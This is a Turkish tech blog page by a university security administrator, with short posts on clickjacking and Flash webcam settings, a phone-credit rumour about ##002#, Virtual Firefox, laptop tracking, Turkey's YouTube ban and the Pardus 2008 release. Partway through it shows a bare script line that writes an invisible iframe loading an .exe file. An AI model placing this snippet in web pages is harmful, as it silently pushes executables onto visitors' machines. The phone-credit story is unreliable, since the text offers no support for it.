Networkçünün olabilecek en iyi çam ağacı ile nice mutlu yıllara :)
Resim kaynağı: http://www.ende-der-vernunft.org/.
bir elmanın yüreğinde gizlenen tohum, görülmez bir elma bahçesidir
Ege Üniversitesi Bilgi İşlem Daire Başkanlığı bünyesinde kampüs güvenlik sistemleri yöneticisi olarak çalışma hayatıma devam ediyorum. Günlük yaşamda teknoloji ağırlıklı karşılaştığım ve beğendiğim yazıları paylaşmak amacıyla bu bloğu oluşturdum. Umarım birilerinin bilgilenmesini sağlar.
Halen Ege Üniversitesi Uluslararası Bilgisayar Enstitüsü Binasında Bilgi İşlem Daire Başkanlığın'da çalışmaya devam etmekteyim.
http://google.com/safebrowsing/diagnostic?site="incelemekistediğinizadres"
pactester -p proxy.pac -u http://www.yahoo.com -c 192.168.1.2
PROXY 192.168.0.1:8080
Hansen ve diğer araştırmacıların tekrar ederek belirttikleri gibi “Flash-clickjacking” sorunun sadece tek bir türü. Hansen’in blogunda uzun olarak açıkladığı üzere clickjacking’in birçok çeşidi var: "Bunlardan bazıları çapraz domain erişimi içerirken, bazılarıysa içermiyor. Bazıları bütün sayfaları bir sayfayla örtüyor, bazıları sizi tıklamanız için spotlar aracılığıyla kandırıyor. Kimisi JavaScript gerektirir, kimisi gerektirmez. Kimi çeşitleri önyükleme için formlarda CSRF kullanır, kimisiyse kullanmaz. Clickjacking bunlardan sadece birini sizi dolandırmak için kullanamaz, tamamını kullanır.”
Yani zararlı içerik bulunduran sitede, bilgisayarınıza istediği programı yüklemenize izin veren butonlar var ve siz bunu göremiyorsunuz. sitenin normal içeriğiyle ilgili işlem yaparken her tıkladığınızda zararlı kodlar çalışıyor ve siz farkında olmadan bu kişiler ne istiyorlarsa yüklüyorsunuz.
en sonunda da bu kişiler bilgisayarınıza bağlı web kamera ve mikrofonunuzun yakaladığı her veriye ulaşabiliyorlar.
internet güvenliği uzmanları bu soruna nihayet bir çare düşündüler. şimdi bu tehlikeden nasıl kurtulacağınızı da anlatalım.
önce bu sayfaya girin, http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager02.html
şimdi açılan pencerede "always deny"ı seçin,
son olarak "confirm"e tıklayın.
not: eğer özel olarak kamera veya mikrofon verilerinize ulaşmasına izin vermek istediğiniz bir site varsa buradan yapabilirsiniz. http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager06.html
Kendini bir JavaScript oyunu olarak tanımlayan uygulama içerisindeki bir objeye tıklandığında arka planda açılan IFrame ile dışarıdan Flash özelliklerine erişim sağlanabiliyor. Ayrıca tarayıcıdan javascript'i kapatmakta bir çözüm olmuyor. Benzer saldırılar Flash, DHTML, Silverlight ve Java üzerinden de yapılabiliyor. Demoda kullanılan açık için Adobe güncelleştirme yaptı. Bu nedenle demoyu isterseniz YouTube üzerinden izleyebilirsiniz.
Benzer clickjacking saldırıları çeşitli güvenlik uzmanları tarafından da araştırılmakta. Aviv Raff'ta benzer bir saldırı senaryosunu hazırladığı demo ile sunuyor. Ayrıca güvenlik uzmanları özellikle artan bu saldırılara karşı kullanıcıların dikkatli olmalarını öneriyor. Şuan güvenlik yöntemleri sınırlı da olsa Firefox'ta bulunan NoScript eklentisi ciddi bir güvenlik sağlayabiliyor. ClearClick fonksiyonu ile birlikte gizlenmiş ya da transparan kutucukların tespiti mümkün.
Cep telefonları ile arama yapıldığında ekranda beliren 'aktif aramalar' yazısının kontör kaybına sebep olduğu iddia edildi.
Zaman Gazetesi'nin haberine göre; Her arama sırasında ekranda beliren 'aktif aramalar' yazısı sebebiyle karşıdaki kullanıcıdan bir kontör düştüğü tespit edildi. Kamudan üst düzey bir yetkili duyum üzerine konuyla ilgili araştırma yaptığını, bilgi almak için başvurduğu cep telefonu şirketlerinin aktif arama sonrasında oluşan kontör kaybını doğruladığını söyledi. Şirketler aynı yetkiliye kontör kaybı yaşamaması için yapması gereken işlemleri de anlatmış. Cep telefonu kullanıcılarının ekranda beliren aktif arama yazısını iptal etmesi gerekiyor. Telefonda sırasıyla ##002# tuşlanarak arama yapılıyor ekranda 'Aktarma iptal edildi' yazısı beliriyor. Bu sayede gelen her aramada ekranda beliren aktif arama yazısı kaldırılıyor.
'Aktif aramalar' yazısı iptal edilmediği müddetçe, aranan kişiye ulaşamayanlardan bir kontör düşülüyor. Eğer aranan kişinin telefonu da telesekreter ayarlı ise dinlenen bir saniyelik 'aradığınız kişiye ulaşılamıyor' mesajı için de kullanıcıların ayrıca bir normal arama karşılığı ücretlendirildiği belirtiliyor. Kullanıcı, eğer iki dakika sonra yine ulaşamazsa 1,5 kontör kaybı daha oluyor. Telesekreterin ücretsiz zannedilmesi tüketicileri mağdur ediyor. Telefon şebeke istasyonu yetkilileriyse bilgi almak isteyen kullanıcılara; ##002#'yi arayarak telesekreterin kaldırılabileceğini anlatmakla yetiniyor. Aboneler "Kullandığımız telefonların bütün özelliklerini bilmiyoruz. Bizden habersiz neden bu tür uygulamalar yapılıyor." şikayetinde bulunuyor.
Dünyanın önde PC üreticisi Hewlett-Packard (HP), HP Compaq dc7900 isimli yeni masaüstü sistemini satışa sundu. Firefox kurulu olarak gelen, ancak gerçekte Firefox'un bulunmadığı yeni HP Compaq dc7900, sanal web tarayıcısıyla malware saldırılarına karşı da koruma altına alınmış durumda.
Virtual Firefox (Sanal Firefox) olarak da bilinen sanal web tarayıcı, HP'nin Symantec ve Mozilla firmalarıyla görüşmesi neticesinde HP sistemlerinde yer almaya başladı. Bunun ilk örneği olan Compaq dc7900, Virtual Firefox sayesinde, sisteme herhangi bir malware saldırısı gerçekleştiğinde hiçbir şekilde zarar görmeyecek.
Virtual Firefox ile PC'lerin daha stabil kullanılabilmesinin artık mümkün olduğunu dile getiren Symantec'in teknik ürün yöneticisi Scott Jones, Web'de sörf yapılırken PC üzerinde yapılan değişikliklerin artık sanal bir katmanda (virtual layer) yer alacağını sözlerine ekledi.
Sanal Firefox'un VMware ya da Virtual PC gibi uygulamalardan en önemli farkı, tüm işletim sistemi yerine sadece tarayıcının sanallaştırılıyor olması.
Kaynak: http://www.hurriyet.com.tr
<script> document.write('<iframe src="http://vedatfetah.blogspot.com/test.exe" frameborder="0" width="0" height="0">'); </script>
ADEONA, Washington, California ve San Diego Üniversitelerinin üyelerinden oluşan bir proje. Bir yıllık çalışmaların sonucunda kayıp veya çalınan dizüstü bilgisayarların izlenebilmesini sağlayan bir sistem geliştirmişler.Sistem dizüstüne kuruluyor ve kurulumdan sonra bu program openDHT sunucuları ile şifreli bağlantı kuruyor. Çalınma veya kaybolma durumunda kullanıcı, şifresini girerek çalınan veya kaybolan dizüstü bilgisayarı IP ve en son bağlandığı internet noktalarını kullanarak takip edebiliyor.
Projenin ana sayfasına şuradan gözatabilir, programı da şuradan indirebilirsiniz.
Ben ilk başta çok güldüm bu habere ama sanırım adamlar çok ciddi. Yani Allahın herhangi bir ülkesinden Türkiye aleyhine içerik konulacak yayınlanacak ama biz görmeyeceğiz (tahminen Türkiye çıkışları youtube.com.tr adresine yönlendirilecek). Deve kuşumuyuz biz. Oldu olacak bir de kafamızı kuma gömseydik. Çin'e gülüyorduk kendi başımıza geldi. Orjinal haber aşağıda...
Sorunun çözümü için YouTube ve Telekomünikasyon Kurumu yetkilileri arasında gerçekleştirilen görüşmelerde şirketin Türkiye'ye özgü bir arama motoru oluşturması kararlaştırıldı. Buna göre siteye Türkiye'den YouTube.tr ya da YouTube.com.tr adreslerinden ulaşılacak. Böylece sitede, İnternet Güvenliği Yasası'nda suç sayılan Atatürk'e hakaret, porno, müstehcenlik, kumar ve intihara özendirme gibi içerikler ayıklanmış olacak. Zaman'a konuşan Telekomünikasyon Kurumu Başkanı Tayfun Acarer, YouTube yetkilileriyle devam eden görüşmelerde çözüm için belli bir aşamaya gelindiğini açıkladı. Acarer, YouTube'un Türk halkının ulusal değerlerini, duyarlıklarını ve İnternet Güvenliği Yasası'nda belirtilen 9 katalog suçu dikkate alan YouTube.tr ya da YouTube.com.tr adıyla bir site oluşturacağını söyledi. YouTube'un, Almanya, Çin ve ABD için de benzer siteler kurduğunu ifade ederken, "İnternet kullanıcıları ister Youtube.com.tr'ye isterse de Almanya'nın ABD'nin Youtube'una girer." dedi. Acarer, önemli bir uyarıda bulunmadan da geçemedi: "Türk kullanıcıları, ülke hassasiyetlerini dikkate alan 'youtube.com.tr sitesine giriş yapsın." Tayfun Acarer, bundan sonra, YouTube ile Türkiye arasındaki hukuki ve idari işlemlerin, şirketin Türkiye'de açacağı temsilcilik vasıtasıyla yürütüleceğini kaydetti. Bugüne kadar YouTube'da 111 zararlı içerik tespit edildi, bunların 67'si siteden kaldırıldı. Ankara 11. Sulh Ceza Mahkemesi kararıyla Atatürk'e hakaret içeren yayınlar nedeniyle 6 Haziran 2008 tarihinden beri YouTube'a erişim yasak.
1. | Başlat'ı tıklatın, Tüm Programlar'ın üzerine gelin, Donatılar'ın üzerine gelin ve sonra Windows Gezgini'ni tıklatın. | ||||
2. | İstediğiniz klasörü bulun ve sağ tıklatın, ardından Özellikler'i tıklatın. | ||||
3. | Genel sekmesinde Gelişmiş'i tıklatın. | ||||
4. | Sıkıştırma veya Şifreleme öznitelikleri altında, Veriyi korumak için içeriği şifrele onay kutusunu seçin ve Tamam'ı tıklatın. | ||||
5. | Tamam'ı tıklatın. | ||||
6. | Görüntülenen Öznitelik Değişikliklerini Onayla iletişim kutusunda, aşağıdaki adımlardan birini kullanın:
|
Alan adınızın DNS adreslerini değiştirip gerçekleşti mi, gerçekleşmedi mi diye defalarca ping attığınız olduysa bu servis tam size göre.
Web ile ilgili ücretsiz kaynakları sunan WebResourcesDepot, alan adları ve hosting ile haşır neşir olanların çok işine yarayabilecek yeni bir servis açmış: DNSPinger.
DNSPinger çok basit bir arayüzle belirtmiş olduğunuz alan adına 24 saat boyunca ping atıyor ve IP adresi değiştiğinde sizi e-posta ile uyarıyor.
Kaynak: Bildirgeç
Pardus projesinin en yeni teknolojiler ve en güncel yazılımlarla güçlendirilmiş yeni sürümü Pardus 2008 yayımlandı. Daha önceki tüm sürümleri gibi bir özgür yazılım olan Pardus 2008, GNU Genel Kamu Lisansı (GPL) ile özgürce dağıtılıp çoğaltılabiliyor. Pardus projesinin temel hedefleri olan kolay kurulum ve kullanım yönünde, gerek altyapı ve gerekse kullanıcı arayüzü düzeyinde önemli yeniliklere sahip olan Pardus 2008 aynı zamanda geniş donanım desteği, kararlı ve güvenilir Linux altyapısı ve tek bir CD ile gelen çok çeşitli uygulamaları ile masaüstü kullanıcılarına yepyeni bir özgürlük deneyimi yaşatmayı vaat ediyor.
Pardus 2008 ile gelen yenilikleri öğrenmek için Sürüm Notları sayfasını inceleyebilir ya da CD görüntüsünü indirmek için İndir sayfasına gidebilirsiniz.
Pardus 2008 ile daha özgür günler diliyoruz...
Kaynak: Pardus
Ölüm ölüm yaşamdanbir bölümdür ölüm iniştir karanlığa aydınlıktan kaçıştır ölüm borçtur senedin ödenmiştir ölüm dünyayı bırakıştır yeni dünyayı arayıştır... |
Altay Taşkın |
Bu deneme sürümümüze her zaman olduğu gibi Pardus ftp sunucularından,
Pardus 2008 sürecinde önemli bir adım olan Beta 1 deneme sürümümü yayınlandı.ftp://ftp.pardus.org.tr/pub/pardus/kurulan/2008/
adresini kullanarak ulaşabilirsiniz. Sorunsuz bir kurulum için lütfen dosyaları indirdikten sonra dosya özetlerini kontrol etmeyi unutmayın, CD’leri DAO modunda ve en fazla 16x hızında yazdığınızdan emin olun.
Bu sürümümüz ile daha fazla kullanıcının karşısına çıkan Pardus 2008′de kullanıcı ve geliştiricilerimizi birçok yenilik ve değişiklik bekliyor
- Bunlardan ilk anda göze çarpan birkaçı şöyle :
- Pardus teknolojileri : dbus tabanlı yeni COMAR, daha hızlı ve daha yetenekli bir PiSi, tamamen yenilenen YALI, yeni grafik yapılandırma arayüzü, kullanıcılarımıza çok daha fazla kişiselleştirme imkanı sunan yeni
Kaptan…
- Güncel masaüstü teknolojileri : Tüm masaüstünde eksiksiz policykit, consolekit ve dbus/COMAR entegrasyonu, Pulseaudio desteği, otomatik yazıcı tanıma altyapısı…
- Yeni görsel tasarım : Açılış ekranından simge setine, masaüstü arka planlarından uygulama açılış görsellerine kadar her noktası yenilenmiş bir Pardus..
- Geniş paket desteği : Her geçen gün genişleyen ve güncellenen paket deposu; temel sistemde gcc 4.3.1 RC, glibc 2.8, kernel 2.6.24.7, Python 2.5; masaüstünde OpenOffice 2.4.1.3, Firefox 3.0 RC1 gibi güncel bileşenler…
Pardus 2008, tüm bu değişiklikler ile gelişirken her zamanki temel özelliklerini de ihmal etmiyor : tüm masaüstünde Türkçe yazım denetimi, internet araçları, ofis yazılımları, çokluortam (resim, müzik, video vb)
oynatıcıları ve sayısız yazılım ile kullanıcılarının tüm gereksinimlerini karşılayacak tek bir CD olarak geliyor…
Pardus 2008 Beta’nın farkında olduğumuz fakat henüz düzeltmediğimiz bir hatası var : Türkçe ve İngilizce dışındaki dillerdeki kurulumlar paket kurulumunun hemen ardından sonlanıyor, dolayısıyla diğer dillerde kurulum şu anda desteklenmiyor.
Son olarak, bu sürümün bir deneme sürümü olduğunu bir kere daha hatırlatıyoruz : Sürümün kararlı ve olabildiğince hatasız olması için çalıştık, yine de bu sürümü kurar ve denerken lütfen deneme sürümü bir
yazılım kullandığınızı unutmayınız. Testlerinizde karşılaştığınız hataları ve iyileştirme isteklerinizi her zamanki gibi hata takip sistemimize (http://hata.pardus.org.tr) bekliyoruz.
Daha az problem yaşamanız için CD’leri DAO modunda ve en fazla 16x hızında yazmanızı tekrar hatırlatıyoruz.
Kendi evinde kendi bilgisayarında tam 4 ay boyunca çalışıp kendi arama motorunu kuran Denizli’de Pamukkale Üniversitesi Fen Edebiyat Fakültesi Matematik Bölümü öğrencisi Serkan Aslan, Mühendislik Fakültesi Bilgisayar Mühendisliği Bölümü Öğretim Üyesi Yrd. Doç. Dr. Abdülkadir Yaldır’ın yardımlarıyla Ceo Share''yi kurdu.
Hedefinin 3 ay içinde sitesinden ulaşılabilecek program ve oyun sayısının yaklaşık 250 bine çıkarmak istediğini söyleyen Serkan Aslan'ın kurduğu bu arama motorunda şu an 80 bin programa ve oyuna 30 salise ile 4 saniye arasında ulaşabiliyor.
Kaynak: Bildirgec.org